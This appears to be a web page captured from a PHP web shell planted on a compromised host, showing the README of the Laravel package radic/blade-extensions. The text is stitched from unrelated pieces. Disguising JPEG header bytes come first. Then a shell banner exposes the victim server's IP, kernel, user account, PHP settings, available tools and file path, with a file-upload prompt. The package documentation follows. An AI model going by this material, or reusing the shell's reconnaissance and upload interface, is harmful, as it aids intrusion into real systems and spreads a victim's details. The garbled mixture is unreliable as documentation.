ÿØÿà JFIF H H ÿÛ C ÿÛ Cÿ " ÿÄ ÿÄ ÿÚ ±5¬€ ÿÄ àÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÄ àÿÚ ?! ÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÙ
| Server IP : 160.25.81.117 / Your IP : 216.73.216.137 Web Server : Apache/2 System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : bellizen ( 1045) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/bellizen/domains/bellizeno.com/private_html/vendor/radic/blade-extensions/ |
Upload File : |
 Laravel Blade Extensions ======================== [](https://travis-ci.org/RobinRadic/blade-extensions) [](http://badge.fury.io/gh/robinradic%2Fblade-extensions) [](https://packagist.org/packages/radic/blade-extensions) [](http://radic.mit-license.org) <!-- [](http://robin.radic.nl/blade-extensions/coverage) --> A _Laravel_ package providing additional Blade functionality. **Tested on all Laravel 5.x versions.** The package follows the FIG standards PSR-1, PSR-2, and PSR-4 to ensure a high level of interoperability between shared PHP code. ### Version 7.0 <!-- [**Documentation**](http://robin.radic.nl/blade-extensions) (or alternatively read it [**here**](docs/index.md) on github) --> - [**Documentation**](docs/index.md) - [**Changelog & Upgrade guide**](docs/prologue/changelog-upgrade-guide.md) #### Features - Compatible with [all Laravel 5 versions](https://travis-ci.org/RobinRadic/blade-extensions) - **20+** Configurable, extendable, replaceable, testable directives. - Compile Blade strings **with** variables `BladeExtensions::compileString($string, array $vars = [])` - Progamatically push content to a stack inside blade view(s) `BladeExtensions::pushToStack($stack, $views, $content)` #### Directives All directives can be disabled, extended or replaced. - [@set / @unset](docs/directives/set-unset.md) Setting and unsetting of values - [@breakpoint / @dump](docs/directives/breakpoint-dump.md) Dump values to screen and set breakpoints in views - [@foreach / @break / @continue](docs/directives/foreach-break-continue.md) Loop data and extras (similair to twig `$loop`) - [@embed](docs/directives/embed.md) Think of embed as combining the behaviour of include and extends. (similair to twig `embed`) - [@minify / @endminify](docs/directives/minify.md) Minify inline code. Supports CSS, JS and HTML. - [@macro / @endmacro/ @macrodef](docs/directives/macro.md) Defining and running macros - [@markdown/ @endmarkdown](docs/directives/markdown.md) - [@spaceless / @endspaceless](docs/directives/spaceless.md) - and more... ` ### Installation #### 1. Composer ```JSON "radic/blade-extensions": "~7.0" ``` #### 2. Laravel ```php Radic\BladeExtensions\BladeExtensionsServiceProvider::class ``` #### 3. Console ```bash php artisan publish --tag=config --provider="Radic\BladeExtensions\BladeExtensionsServiceProvider" ``` ### Contribute [Read the contribution guide](docs/prologue/contribution-guide.md) ### Copyright/License Copyright 2015 [Robin Radic](https://github.com/RobinRadic) - [MIT Licensed](http://radic.mit-license.org)